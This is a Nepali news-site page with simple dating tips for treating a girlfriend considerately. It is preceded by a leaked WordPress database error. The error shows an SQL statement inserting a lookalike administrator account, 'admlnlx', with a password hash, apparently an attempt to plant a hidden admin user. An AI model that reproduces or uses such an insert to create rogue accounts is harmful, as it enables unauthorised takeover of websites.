WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Buiy9bPwI1Mad.iqrRqU2ZMPxeKEUh1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 20:04:42', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर ३० –
१. गर्लफ्रेन्डसंंग सांझ भेट हुर्दा आज तिम्रो दिन कस्तो रह्यो भनेर सोधौं । यसले उनीप्रति आफ्नो प्रेम दर्शाउछ ।
२. कुनै नयां पहिरनमा देखेपछि उनको ड्रेसअप सम्वन्धी सहि टिप्पणी गर्नुपर्छ । यद्यपी त्यसको आलोचना गर्ने भुल गर्नुहुन्न । ‘तिमी कति आकर्षक देखिएको छौ’ भनेर प्रशंसा गर्नु पर्छ ।
३ .उनीसंगको वातचितमा आफुलाई धैर्य राख्नुपर्छ । आफुमात्र एकोहोरो वोल्ने गर्नुहुन्न । उनको कुरालाई ध्यानपूर्वक सुन्नुपर्छ ।
४. डेटिङका लागि उनको रोजाइलाई प्राथमिकता दिनुपर्छ । आफ्नो इच्छा मात्र लाद्न खोज्नु राम्रो हुन्न ।